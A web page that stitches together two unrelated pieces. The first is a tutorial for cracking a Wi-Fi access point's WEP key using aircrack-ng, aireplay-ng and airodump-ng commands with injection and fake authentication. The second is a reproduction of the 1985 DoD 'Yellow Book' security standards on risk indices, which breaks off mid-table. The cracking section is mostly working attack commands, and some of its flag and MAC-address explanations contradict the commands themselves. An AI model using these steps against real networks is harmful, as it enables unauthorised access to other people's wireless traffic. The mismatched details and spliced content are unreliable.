Simple Wi-Fi WEP Crack

wifi-300x189

Overview

To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.
Equipments used
Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)
Software : Backtrack 4 (Free download from http://www.backtrack-linux.org)

Step 1 – Start the wireless interface in monitor mode on AP channel

airmon-ng start wlan1 6
starts wifi interface in channel 6

Step 2 – Test Wireless Device Packet Injection

aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E  wlan1
-9 means injection
-a 00:1B:11:24:27:2E is the access point MAC address

Step 3 – Start airodump-ng to capture the IVs

airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1

Step 4 – Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
-1 means fake authentication
0 reassociation timing in seconds
-e infosec is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
OR
aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
2 – Reauthenticate every 2 seconds.
-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 – Send keep alive packets every 10 seconds.
Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…
Run:tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

You would then look for error messages.
If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…
Run: “tcpdump -n -e -s0 -vvv -i wlan1”

Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.

Step 5 – Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

Step 6 – Run aircrack-ng to obtain the WEP key

aircrack-ng -b 00:1B:11:24:27:2E output*.cap
All Done! icon smile Simple Wi Fi WEP Crack [TUTORIAL]

Guidance for Applying the Department of Defense Trusted Computer System Evaluation Criteria in Specific Environments (June 25, 1985)

                                                    CSC-STD-003-85

                             COMPUTER SECURITY REQUIREMENTS

                   GUIDANCE FOR APPLYING THE DEPARTMENT OF DEFENSE
                     TRUSTED COMPUTER SYSTEM EVALUATION CRITERIA
                               IN SPECIFIC ENVIRONMENTS

Approved for public release;
 distribution unlimited.

      25 June 1985
						CSC-STD-003-85
					   Library No. S-226,727

                                          FOREWORD 

This publication, Computer Security Requirements--Guidance for Applying the
Department of Defense Trusted Computer System Evaluation Criteria in Specific
Environments, is being issued by the DoD Computer Security Center (DoDCSC)
under the authority of and in accordance with DoD Directive 5215.1, "Computer
Security Evaluation Center." It provides guidance for specifying computer
security requirements for the Department of Defense (DoD) by identifying the
minimum class of system required for a given risk index.  System classes are
those defined by CSC-STD-001-83, Department of Defense Trusted Computer System
Evaluation Criteria, 15 August 1983.  Risk index is defined as the disparity
between the minimum clearance or authorization of system users and the maximum
sensitivity of data processed by the system.  This guidance is intended to be
used in establishing minimum computer security requirements for the processing
and/or storage and retrieval of sensitive or classified information by the
Department of Defense whenever automatic data processing systems are employed.
Point of contact concerning this publication is the Office of Standards and
Products, Attention: Chief, Computer Security Standards.

                                         25 June 1985

Robert L. Brotzman
Director
DoD Computer Security Center

				i

		              ACKNOWLEDGMENTS

Acknowledgment is given to the following for formulating the computer security
requirements and the supporting technical and procedural rationale behind
these requirements: Col Roger R.  Schell, formerly DoDCSC, George F.  Jelen,
formerly DoDCSC, Daniel J.  Edwards, Sheila L.  Brand, and Stephen F.
Barnett, DoDCSC.

Acknowledgment is also given to the following for giving generously of their
time and expertise in the review and critique of these computer security
requirements: CDR Robert Emery, OJCS, Dan Mechelke, 902nd MI Gp, Mary Taylor,
DAMI-CIC, Maj.  Freeman, DAMI-CIC, Ralph Neeper, DAMI-CIC, Duane Fagg, NAVDAC,
H.  O.  Lubbes, HAVE LEX, Sue Berg, OPNAV, Susan Tominack, NAVDAC, Lt.  Linda
Fischer, OPNAV, Eugene Epperly, ODUSD(P), Maj.  Grace Culver, USAF- SITT, Capt
Mike Weidner, ASPO, and James P.  Anderson, James P.  Anderson & Co.

And finally, special recognition is extended to H.  William Neugent and Ingrid
M.  Olson of the MITRE Corporation and to Alfred W.  Arsenault of the DoDCSC
for preparation of this document.

				ii

		             TABLE OF CONTENTS
                                                                       Page
FOREWORD..............................................................   i
ACKNOWLEDGMENTS.......................................................  ii
LIST OF TABLES........................................................  iv
1.0 INTRODUCTION......................................................   1
2.0 DEFINITIONS.......................................................   3
3.0 RISK INDEX COMPUTATION............................................   7
4.0 COMPUTER SECURITY REQUIREMENTS....................................  11
REFERENCES............................................................  13

				iii

		              LIST OF TABLES

TABLE  1: Rating Scale for Minimum User Clearance.....................   8
TABLE  2: Rating Scale for Maximum Data Sensitivity...................   9
TABLE  3: Computer Security Requirements..............................  12

                                    iv

							1
 1.0 INTRODUCTION

This document establishes computer security requirements for
the Department of Defense (DoD) by identifying the minimum class of system
required for a given risk index.  The classes are those defined by
CSC-STD-001-83, Department of Defense Trusted Computer System Evaluation
Criteria (henceforth referred to as the Criteria).(1) A system's risk index is
defined as the disparity between the minimum clearance or authorization of
system users and the maximum sensitivity of data processed by the system. [1]

The recommendations in this document are those that the DoD Computer Security
Center (DoDCSC) believes to be the minimum adequate to provide an acceptable
level of security.  These recommendations are made in part due to the fact
that there is no comprehensive policy in effect today which covers this area
of computer security.  Where current policy does exist, however, this document
shall not be taken to supersede or override that policy, nor shall it be taken
to provide exemption from any policy covering areas of security not addressed
in this document.

Section 2 of this document provides definitions of terms used.  Risk index
computation is described in Section 3, while Section 4 presents the computer
security requirements.

----------------------------------
[1] Since a clearance implicitly encompasses lower clearance levels (e.g., a
Secret- cleared user has an implicit Confidential clearance), the phrase
"minimum clearance of the system users" is more accurately stated as "maximum
clearance of the least cleared system user." For simplicity, this document
uses the former phrase.

				                              3

2.0 DEFINITIONS

Application
     Those portions of a system, including portions of the operating system,
     that are not responsible for enforcing the system's security policy.
Category
     A grouping of classified or unclassified but sensitive information to
     which an additional restrictive label is applied to signify that
     personnel are granted access to the information only if they have
     appropriate authorization (e.g., proprietary information (PROPIN),
     information that is Not Releasable to Foreign Nationals (NOFORN),
     compartmented information, information revealing sensitive intelligence
     sources and methods (WNINTEL)).  Closed security environment
     An environment in which both of the following conditions hold true:

     1.  Application developers (including maintainers) have sufficient
         clearances and authorizations to provide acceptable presumption that
         they have not introduced malicious logic.  Sufficient clearance is
         defined as follows: where the maximum classification of the data to
         be processed is Confidential or less, developers are cleared and
         authorized to the same level as the most sensitive data; where the
         maximum classification of the data to be processed is Secret or
         above, developers have at least a Secret clearance.

     2.  Configuration control provides sufficient assurance that
         applications are protected against the introduction of malicious
         logic prior to and during the operation of system applications.

Compartmented security mode

         The mode of operation which allows the system to process two or more
         types of compartmented information (information requiring a special
         authorization)6565 or any one type of compartmented information with
         other than compartmented information.  In this mode, all system users
         need not be cleared for all types of compartmented information
         processed, but must be fully cleared for at least.  Top Secret
         information for unescorted access to the computer.

Configuration control

         Management of changes made to a system's hardware, software,
         firmware, and documentation throughout the development and
         operational life of the system.

    4

Controlled security mode

         The mode of operation that is a type of multilevel security mode in
         which a more limited amount of trust is placed in the
         hardware/software requirement base of the system, with resultant
         restrictions on the classification levels and clearance levels that
         may be supported.

Dedicated security mode

         The mode of operation in which the system is specifically and
         exclusively dedicated to and controlled for the processing of one
         particular type or classification of information, either for
         full-time operation or for a specified period of time.

Environment

         The aggregate of external circumstances, conditions, and events that
         affect the development, operation, and maintenance of a system.

Malicious logic

          Hardware, software, or firmware that is intentionally included in a
          system for the purpose of causing loss or harm (e.g., Trojan
          horses).

Multilevel security mode

          The mode of operation which allows two or more classification
          levels of information to be processed simultaneously within the
          same system when some users are not cleared for all levels of
          information present.

Open security environment

     An environment in which either of the following conditions holds true:

     1. Application developers (including maintainers) do not have sufficient
        clearance (or authorization) to provide an acceptable presumption that
        they have not introduced malicious logic.  (See "Closed security
        environment" for definition of sufficient clearance.)

     2. Configuration control does not provide sufficient assurance that
        applications are protected against the introduction of malicious
        logic prior to and during the operation of system applications.

Risk index

     The disparity between the minimum clearance or authorization of system
     users and the maximum sensitivity (e.g., classification and categories)
     of data processed by a system.
                                                                           5

Sensitive information

     Information that, as determined by a competent authority, must be
     protected because its unauthorized disclosure, alteration, loss, or
     destruction will at least cause perceivable damage to someone or
     something.

     System

     An assembly of computer hardware, software, and firmware configured for
     the purpose of classifying, sorting, calculating, computing, summarizing,
     transmitting and receiving, storing, and retrieving data with a minimum
     of human intervention.

System high security mode

     The mode of operation in which system hardware/software is only trusted
     to provide need-to-know protection between users.  In this mode, the
     entire system, to include all components electrically and/or physically
     connected, must operate with security measures commensurate with the
     highest classification and sensitivity of the information being processed
     and/or stored.  All system users in this environment must possess
     clearances and authorizations for all information contained in the
     system.  All system output must be clearly marked with the highest
     classification and all system caveats, until the information has been
     reviewed manually by an authorized individual to ensure appropriate
     classifications and caveats have been affixed.  

System users

     Those individuals with direct connections to the system, and also those
     individuals without direct connections who receive output or generate
     input that is not reliably reviewed for classification by a responsible
     individual.  The clearance of system users is used in the calculation of
     risk index.  

For additional definitions, refer to the Glossary of TheCriteria.(1)

                                                                           7

3.0 RISK INDEX COMPUTATION

The initial step in determining the minimum evaluation class required for a
system is to determine the system's risk index.  The risk index for a system
depends on the rating associated with the system's minimum user clearance
(Rmin) taken from Table 1 and the rating associated with the system's maximum
data sensitivity (Rmax) taken from Table 2.  The risk index is computed as
follows:

     Case a.  If Rmin is less than Rmax, then the risk index is determined by
subtracting Rmin from Rmax.[1]

                           Risk Index =  Rmax - Rmin

Case b. If Rmin is greater than or equal to Rmax, then

            !---1, if there are categories on the system to which some users
            !      are not authorized access
            !
Risk Index =!
            !
            !--- 0, otherwise

[1]There is one anomalous value that results because there are two "types" of
Top Secret clearance and only one "type" of Top Secret data.  When the minimum
user clearance is TS/BI and the maximum data sensitivity is Top Secret without
categories, then the risk index is 0 (rather than the value 1- which would
result from a straight application of the formula)

 8

                                   TABLE 1

                 RATING SCALE FOR MINIMUM USER CLEARANCE [1].

                                                              RATING
                                                               (Rmin)

  Uncleared (U)                                                  0
  Not Cleared but Authorized Access to Sensitive Unclassified    1
  Information (N)
  Confidential (C)                                               2
  Secret                                                         3
  Top Secret (TS)/Current Background Investigation (BI)          4
  Top Secret (TS)/current Special Background Investigation (SBI) 5
  One Category (1C)                                              6
  Multiple Categories (MC)                                       7

---------------------------------------
[1] The following clearances are as defined in DIS Manual 20-1(2):
Confidential, Secret, Top Secret/Current Background Investigation, Top
Secret/Current Special Background Investigation.

                                                                           9

                                   TABLE 2

                 RATING SCALE FOR MAXIMUM DATA SENSITIVITY

   MAXIMUM DATA
    SENSITIVITY
     RATINGS [2]       RATING      MAXIMUM DATA SENSITIVITY WITH
     WITHOUT           (Rmax)             CATEGORIES [1]
    CATEGORIES
        (Rmax)

    Unclassified(U)      0                 Not Applicable [3]

    Not Classified but   1         N With One or More Categories            2
      Sensitives [4]

    Confidential(C)      2         C With One or More Categories            3

       Secret (S)        3         S With One or More Categories With No    4
                                     More Than One Category Containing
                                              Secret Data
                                   S With Two or More Categories Containing 5
                                                 Secret Data

    Top Secret (TS)     5 [5]       TS With One or More Categories With No   6
                                      More Than One Category Containing
                                           Secret or Top Secret Data
                                    TS With Two or More Categories           7
                                    Containing Secret or Top Secret Data

-------------------------------

[1] The only categories of concern are those for which some users are not
authorized access.  When counting the number of categories, count all
categories regardless of the sensitivity level associated with the data.  If a
category is associated with more than one sensitivity level, it is only
counted at the highest level.

[2] Where the number of categories is large or where a highly sensitive
category is involved, a higher rating might be warranted.

[3] Since categories are sensitive and unclassified data is not, unclassified
data by definition cannot contain categories.

[4] Examples of N data include financial, proprietary, privacy, and mission
sensitive data.  In some situations (e.g., those involving extremely large
financial sums or critical mission sensitive data), a higher rating may be
warranted.  The table prescribes minimum ratings.

[5] The rating increment between the Secret and Top Secret data sensitivity
levels is greater than the increment between other adjacent levels.  This
difference derives from the fact that the loss of Top Secret data causes
exceptionally grave damage to the national security, whereas the loss of
Secret data causes only serious damage.

                                                                           11

4.0 COMPUTER SECURITY REQUIREMENTS

Table 3 identifies the minimum evaluation class appropriate for systems based
on the risk index computed in Section 3.  The classes identified are those
from The Criteria.(1) A risk index of 0 encompasses those systems operating in
either system high or dedicated security mode.  Risk indices of 1 through 7
encompass those systems operating in multilevel, controlled, compartmented, or
the Navy's limited access security mode; that is, those systems in which not
all users are fully cleared or authorized access to all sensitive or
classified data being processed and/or stored in the system.  In situations
where the local environment indicates that additional risk factors are
present, a system of a higher evaluation class may be required.

 12

                                  TABLE 3

                       COMPUTER SECURITY REQUIREMENTS

                                           MINIMUM          MINIMUM
 RISK INDEX     SECURITY OPERATING MODE  CRITERIA CLASS  CRITERIA CLASS
                                          FOR OPEN         FOR CLOSED
                                          ENVIRONMENTS [4]  ENVIRONMENTS [4]

  0                Dedicated           No Prescribed   No Prescribed
			    	Minimum [1]     Minimum [1]	     

  0               System High               C2[2]            C2[2]

  1       Limited Access, Controlled,       B1[3]            B1[3]
           Compartmented, Multilevel

  2       Limited Access, Controlled,       B2               B2
             Compartmented, Multilevel

  3          Controlled, Multilevel         B3               B2

  4               Multilevel                A1               B3

  5               Multilevel                *                *

  6               Multilevel                *                *

  7               Multilevel                *                *

--------------------

[1] Although there is no prescribed minimum class, the integrity and denial of
service requirements of many systems warrant at least class C1 protection.

[2] If the system processes sensitive or classified data, at least a class C2
system is required.  If the system does not process sensitive or classified
data, a class C1 system is sufficient.

[3] Where a system processes classified or compartmented data and some users
do not have at least a Confidential clearance, or when there are more than two
types of compartmented information being processed, at least a class B2 system
is required.

[4] The asterisk (*) indicates that computer protection for environments with
that risk index is considered to be beyond the state of current computer
security technology.  Such environments must augment technical protection with
physical, personnel, and/or administrative security solutions.

                                                                      13

                      REFERENCES

1.   DoD Computer Security Center, DoD Trusted Computer System Evaluation
     Criteria, CSC-STD-001-83, 15 August 1983.  

2.  Defense Investigative Service (DIS) Manual 20-1, Manual for Personnel
    Investigations, 30 January 1981 .

The Yellow Book: Guideance for Applying the Department of Defense Trusted Computer System Evaluation Criteria in SPecific Environm,ents (June 1985)

 
                                                 CSC-STD-004-85

              TECHNICAL RATIONAL BEHIND CSC-STD-003-85:
                   COMPUTER SECURITY REQUIREMENTS

              GUIDANCE FOR APPLYING THE DEPARTMENT OF DEFENSE
                TRUSTED COMPUTER SYSTEM EVALUATION CRITERIA
                         IN SPECIFIC ENVIRONMENTS

              Approved for public release;
              distribution unlimited.

              25 June 1985

                                            CSC-STD-004-85
                                        Library No. S-226,728

                        FOREWORD

This publication, Technical Rationale Behind CSC-STD-003-85: Computer Security
Requirements--Guidance for Applying the Department of Defense Trusted Computer
System Evaluation Criteria in Specific Environments, is being issued by the DoD
Computer Security Center (DoDCSC) under the authority of and in accordance with
DoD Directive 5215.1, "Computer Security Evaluation Center." This document
presents background discussion and rationale for CSC-STD-003-85, Computer
Security Requirements--Guidance for Applying the Department of Defense Trusted
Computer System Evaluation Criteria in Specific Environments. The computer
security requirements identify the minimum class of system required for a given
risk index. System classes are those defined by CSC-STD-001-83, Department of
Defense Trusted Computer System Evaluation Criteria, 15 August 1983. Risk index
is defined as the disparity between the minimum clearance or authorization of
system users and the maximum sensitivity of data processed by the system. This
guidance is intended to be used in establishing minimum computer security
requirements for the processing an-or storage and retrieval of sensitive or
classified information by the Department of Defense whenever automatic data
processing systems are employed. Point of contact concerning this publication is
the Office of Standards and Products, Attention: Chief, Computer Security
Standards.

                                 25 June 1985
Robert L. Brotzman
Director
DoD Computer Security Center

                ACKNOWLEDGMENTS

Special recognition is extended to H.  William Neugent and Ingrid M.  Olson of
the MITRE Corporation for performing in-depth analysis of DoD policies and
procedures and for preparation of this document.

Acknowledgment is given to the following for formulating the computer security
requirements and the supporting technical and procedural rationale behind these
requirements: Col Roger R. Schell, formerly DoDCSC, George F. Jelen, formerly
DoDCSC, Daniel J. Edwards, Sheila L. Brand, and Stephen F. Barnett, DoDCSC.

Acknowledgment is also given to the following for giving generously of their
time and expertise in the review and critique of this document: CDR Robert
Emery, OJCS, Dan Mechelke, 902nd Ml Gp, Mary Taylor, DAMI-CIC, Maj.  Freeman,
DAMI- CIC, Ralph Neeper, DAMI-CIC, Duane Fagg, NAVDAC, H.  O.  Lubbes, NAVELEX,
Sue Berg, OPNAV, Susan Tominack, NAVDAC, Lt Linda Fischer, OPNAV, Eugene
Epperly, ODUSD(P), Maj Grace Culver, USAF-SITT, Capt Mike Weidner, ASPO, Alfred
W.  Arsenault, DoDCSC, James P.  Anderson, James P.  Anderson & Co., and Dr.
John Vasak, MITRE Corporation.

                                    ii

               TABLE OF CONTENTS
FOREWORD.............................................................   i
ACKNOWLEDGMENTS......................................................  ii
LIST OF TABLES.......................................................  iv
1.0 INTRODUCTION.....................................................   1
2.0 RISE INDEX.......................................................   5
3.0 COMPUTER SECURITY REQUIREMENTS FOR OPEN
    SECURITY ENVIRONMENTS............................................   11
4.0 COMPUTER SECURITY REQUIREMENTS FOR CLOSED
    SECURITY ENVIRONMENTS............................................   19
APPENDIX A: SUMMARY OF CRITERIA......................................   23
APPENDIX B: DETAILED DESCRIPTION OF CLEARANCES
     AND DATA SENSITIVITIES..........................................   27
APPENDIX C: ENVIRONMENTAL TYPES......................................   31
GLOSSARY.............................................................   33
ACRONYMS.............................................................   37
REFERENCES...........................................................   39

                                   iii

                 LIST OF TABLES
Table
1: Rating Scale for Minimum User Clearance.........................    6
2: Rating Scale for Maximum Data Sensitivity.......................    7
3: Security Risk Index Matrix......................................    8
4: Computer Security Requirements for Open Security Environments...   12
5: Security Index Matrix for Open Security Environments............   13
6: Computer Security Requirements for Closed Security Environments.   20
7: Security Index Matrix for Closed Security Environments..........   21

                                    iv

 1.0 INTRODUCTION
The purpose of this technical report is to present background discussion and
rationale for Computer Security Requirements--Guidance for Applying the DoD
Trusted Computer System Evaluation Criteria in Specific Environments(1)
(henceforth referred to as the Computer Security Requirements).  The
requirements were prepared in compliance with responsibilities assigned to the
Department of Defense (DoD) Computer Security Center (DoDCSC) under DoD
Directive 5215.1, which tasks the DoDCSC to "establish and maintain technical
standards and criteria for the evaluation of trusted computer systems."(2)

DoD computer systems have stringent requirements for security. In the past,
these requirements have been satisfied primarily through physical, personnel,
and information security safeguards.(3) Recent advances in technology make it
possible to place increasing trust in the computer system itself, thereby
increasing security effectiveness and efficiency. In turn, the need has arisen
for guidance on how this new technology should be used. There are two facets to
this required guidance:

     a.  Establishment of a metric for categorizing systems according to the
         security protection they provide.

     b.  Identification of the minimum security protection required in
         different environments.

The DoD Trusted Computer System Evaluation Criteria (henceforth referred to
as the Criteria), developed by the DoDCSC, satisfy the first of these two
requirements by categorizing computer systems into hierarchical security
classes.(4) The Computer Security Requirements satisfy the second requirement
by identifying the minimum classes appropriate for systems in different risk
environments. They are to be used by system managers in applying the Criteria
and thereby in selecting and specifying systems that have sufficient security
protection for specific operational environments.

Section 2 of this document discusses the risk index.  Section 3 presents a
discussion of the Computer Security Requirements for open security
environments.  Section 4 presents a discussion of the Computer Security
Requirements for closed security environments. A summary of the Criteria is
contained in Appendix A.  Appendix B contains a detailed description of
clearances and data sensitivities, and Appendix C describes the environmental
types.  A glossary provides definitions of many of the terms used in this
document.

1.1 Scope and Applicability

This section describes the scope and applicability for both this report and the
Computer Security Requirements. The primary focus of both documents is on the
technical aspects (e.g., hardware, software, configuration control) of computer
security, although the two documents also address the relationship between
computer security and physical, personnel, and information security.  While

                                    2

communications and emanations security are important elements of system
security, they are outside the scope of the two documents.

Both documents apply to DoD computer systems that are entrusted with the
protection of information, regardless of whether or not that information is
classified, sensitive, national security-related, or any combination thereof.
Furthermore, both documents can be applied throughout the DoD.(5,6,7,8,9)

The two documents are concerned with protection against both disclosure and
integrity violations. Integrity violations are of particular concern for
sensitive unclassified information (e.g., financial data) as well as for some
classified applications (e.g., missile guidance data).

The recommendations of both this report and the Computer Security
Requirements are stated in terms of classes from the Criteria. Embodied in each
class and therefore encompassed within the scope of both documents are two
types of requirements:  assurance and feature requirements.  Assurance
requirements are those that contribute to confidence that the required features
are present and that the system is functioning as intended.  Examples of
assurance requirements include modular design, penetration testing, formal
verification, and trusted configuration management.  Feature requirements
encompass capabilities such as labeling, authentication, and auditing.

1.2 Security Operating Modes

DoD computer security policy identifies several security operating modes, for
which the following definitions are adapted:(10,11,12,13)

     a.  Dedicated Security Mode--The mode of operation in which the system is
         specifically and exclusively dedicated to and controlled for the
         processing of one particular type or classification of information,
         either for fulltime operation or for a specified period of time.

     b.  System High Security Mode--The mode of operation in which system
         hardware/software is only trusted to provide need-to-know protection
         between users.  In this mode, the entire system, to include all
         components electrically and/or physically connected, must operate with
         security measures commensurate with the highest classification and
         sensitivity of the information being processed and/or stored.  All
         system users in this environment must possess clearances and
         authorizations for all information contained in the system, and all
         system output must be clearly marked with the highest classification
         and all system caveats, until the information has been reviewed
         manually by an authorized individual to ensure appropriate
         classifications and caveats have been affixed.

     c.  Multilevel Security Mode--The mode of operation which allows two or
         more classification levels of information to be processed
         simultaneously within the same system when some users are not cleared
         for all levels of information present.
                                      3

     d.  Controlled Mode--The mode of operation that is a type of multilevel
         security in which a more limited amount of trust is placed in the
         hardware/software base of the system, with resultant restrictions on
         the classification levels and clearance levels that may be supported.

     e.  Compartmented Security Mode--The mode of operation which allows
         the system to process two or more types of compartmented information
         (information requiring a special authorization) or any one type of
         compartmented information with other than compartmented information.
         In this mode, system access is secured to at least the Top Secret (TS)
         level, but all system users need not necessarily be formally
         authorized access to all types of compartmented information being
         processed and/or stored in the system.

In addition to these security operating modes, Service policies may define
other modes of operation.  For example, Office of the Chief of Naval Operations
(OPNAV) Instruction 5239.  IA defines Limited Access Mode for those systems in
which the minimum user clearance is uncleared and the maximum data sensitivity
is not classified but sensitive (6)

                                 5

2.0 RISK INDEX

The evaluation class appropriate for a system is dependent on the level of
security risk inherent to that system.  This inherent risk is referred to as
that systems risk index.  Risk index is defined as follows:
     The disparity between the minimum clearance or authorization of system
     users and the maximum sensitivity of data processed by a system.

The Computer Security Requirements are based upon this risk index.  Although
there are other factors that can influence security risk, such as mission
criticality, required denial of service protection, and threat severity, only
the risk index is used to determine the minimum class of trusted systems to be
employed, since it can be uniformly applied in the determination of security
risk.  The risk index for a system depends on the rating associated with the
system's mimimum user clearance (Rmin) taken from Table 1 and the rating
associated with the system's maximum data sensitivity (Rmax) taken from Table

2.  The risk index is computed as follows:

Case a. If Rmin is less than Rmax, then the risk index is determined by
subtracting Rmin from Rmax.2
                        Risk Index  Rmax   Rmin

Case b. If Rmin is greater than or equal to Rmax, then
                1, if there are categories on the system to which some users
                   are not authorized access;
Risk Index
                0, otherwise (i.e., if there are no categories on the system or
                   if all users are authorized access to all categories)

     Example: For a system with a minimum user clearance of Confidential and
     maximum data sensititivy of Secret (without categories), Rmin 2 and
     Rmax 3.

1 Since a clearance implicitly encompasses lower clearance levels (e.g., a
Secret- cleared user has an implicit Confidential clearance), the phrase
"minimum clearance...of system users" is more accurately stated as "maximum
clearance of the least cleared system user." For simplicity, this document uses
the former phrase.

2 There is one anomalous case in which this formula gives an incorrect result
This is the case where the minimum clearance is Top Secret/Background
Investigation and the maximum data sensitivity is Top Secret. According to
the formula, this gives a risk index of l. In actuality, the risk index in this
case is zero. The anomaly results because there are two "levels" of Top Secret
clearance and only one level of Top Secret data.

                                     6

                        TABLE 1

       RATING SCALE FOR MINIMUM USER CLEARANCE1

            MINIMUM USER CLEARANCE                                RATING

                      Uncleared (U)                                  0

   Not Cleared but Authorized Access to Sensitive Unclassified       1
                     Information (N)
                     Confidential (C)                                2
                        Secret(S)                                    3
     Top Secret (TS)/Current Background Investigation (BI)           4
 Top Secret (TS)/Current Special Background Investigation (SBI)      5
                One Category (1C)                                    6
              Multiple Categories (MC)                               7

1 See Appendix B for a detailed description of the terms listed

                             7

                       TABLE 2

      RATING SCALE FOR MAXIMUM DATA SENSITIVITY

 MAXIMUM DATA
  SENSITIVITY
  RATINGS 2         RATING   MAXIMUM DATA SENSITIVITY WITH
    WITHOUT         (Rmax)        CATEGORIES1
  CATEGORIES
     (Rmax)

 Unclassified (U)      0          Not Applicable3
Not Classified but     1     N With One or More Categories            2
     Sensitives4
 Confidential (C)      2     C With One or More Categories            3
   Secret(S)           3     S With One or More Categories With No    4
                               More Than One Category Containing
                               Secret Data
                             S With Two or More Categories Containing 5
                               Secret Data
 Top Secret (TS)       55    TS With One or More Categories With No   6
                             More Than One Category Containing
                             Secret or Top Secret Data
                             TS With Two or More Categories           7
                             Containing Secret or Top Secret Data

1 The only categories of concern are those for which some users are not
authorized access to the category.  When counting the number of categories,
count all categories regardless of the sensitivity level associated with the
data.  If a category is associated with more than one sensitivity level, it is
only counted at the highest level.

2 Where the number of categories is large or where a highly sensitive category
is involved, a higher rating might be warranted.

3 Since categories imply sensitivity of data and unclassified data is not
sensitive, unclassified data by definition cannot contain categories.

4 N data includes financial, proprietary, privacy, and mission sensitive data.
Some situations (e.g., those involving extremely large financial sums or
critical mission sensitive data), may warrant a higher rating.  The table
prescribes minimum ratings

5 The rating increment between the Secret and Top Secret data sensitivity
levels is greater than the increment between other adjacent levels.  This
difference derives from the fact that the loss of Top Secret data causes
exceptionally grave damage to the national security, whereas the loss of Secret
data causes only serious damage.  (4)

			         8

                            TABLE 3
                  SECURITY RISK INDEX MATRIX

                         Maximum Data Sensitivity

                             U     N     C    S    TS   1C   MC

                      U      0     1     2    3    4    5    6
                      N      0     0     1    2    4    5    6
   Minimum            C      0     0     0    1    3    4    5
   Clearance          S      0     0     0    0    2    3    4
   or
   Authorization    TS(BI)   0     0     0    0    0    2    3
   of
   System Users     TS(SBI)  0     0     0    0    0    1    2
                      1C     0     0     0    0    0    0    1
                      MC     0     0     0    0    0    0    0

U = Uncleared or Unclassified
N = Not Cleared but Authorized Access to Sensitive Unclassified Information or
Not Classified but Sensitive
C = Confidential
S = Secret
TS = Top Secret
TS(BI) = Top Secret (Background Investigation)
TS(SBI) = Top Secret (Special Background Investigation)
1C = One Category
MC = Multiple Categories
                                 9

In situations where the local environment indicates that additional risk
factors are present, a larger risk index may be warranted.  Table 2 and the
above discussion show how the presence of nonhierarchical sensitivity
categories such as NOFORN (Not Releasable to Foreign Nationals) and PROPIN
(Caution- Proprietary Information Involved) influences the ratings.(14)
Compartmented information is also encompassed by the term sensitivity
categories as is information revealing sensitive intelligence sources and
methods.  A' subcategory (and a subcompartment) is considered to be independent
from the category to which it is subsidiary.

Table 3 presents a matrix summarizing the risk' indices corresponding to the
various clearance/sensitivity pairings. For simplicity no categories are
associated with the maximum data sensitivity levels below Top Secret.
                                     11

3.0 COMPUTER SECURITY REQUIREMENTS FOR OPEN
    SECURITY ENVIRONMENTS

This section discusses the application of the Computer Security Requirements to
systems in open security environments. An open security environment is one in
which system applications are not adequately protected against the insertion of
malicious logic.  Appendix C describes malicious logic and the open security
environment in more detail.

3.1 Recommended Classes

Table 4 presents the minimim evaluation class identified in the Computer
Security Requirements for different risk indices in an open security
environment.  Table 5 illustrates the impact of the requirements on individual
minimum clearance/maximum data sensitivity pairings, where no categories are
associated with maximum data sensitivity below Top Secret.  The minimum
evaluation class is determined by finding the matrix entry corresponding to the
minimum clearance or authorization of system users and the maximum sensitivity
of data processed by the system.

     Example: If the minimum clearance of system users is Secret and the
     maximum sensitivity of data processed is Top Secret (with no categories),
     then the risk index is 2 and a class B2 system is required.

The classes identified are minimum values.  Environmental characteristics must
be examined to determine whether a higher class is warranted.  Factors that
might argue for a higher evaluation class include the following:

     a. High volume of information at the maximum data sensitivity.

     b. Large number of users with minimum clearance.

Both of these factors are often present in networks.

The guidance embodied in the Computer Security Requirements is best used during
system requirements definition to determine which class of trusted system is
required given the risk index envisioned for a specific environment. They are
also of use in determining which choices are feasible given either the maximum
sensitivity of data to be processed or minimum user clearance or authorization
requirements. The Computer Security Requirements can also be used in a security
evaluation to determine whether system safeguards are sufficient.

3.2 Risk index and Operational Modes

Situations with a risk index of zero encompass systems operating in system high
or dedicated mode.  Systems operating in dedicated mode--in which all users
have both the clearance and the need-to-know for all information in the
system--do not need to rely on hardware and software protection measures for
security.(10) Therefore, no minimum level of trust is prescribed.  However,
because of the integrity and denial of service requirements of many systems,
additional protective features may be warranted.

                                 12

                             TABLE 4

  COMPUTER SECURITY      REQUIREMENTS FOR OPEN SECURITY
                         ENVIRONMENTS

    RISK INDEX         SECURITY OPERATING        MINIMUM CRITERIA
                               MODE                  CLASS1

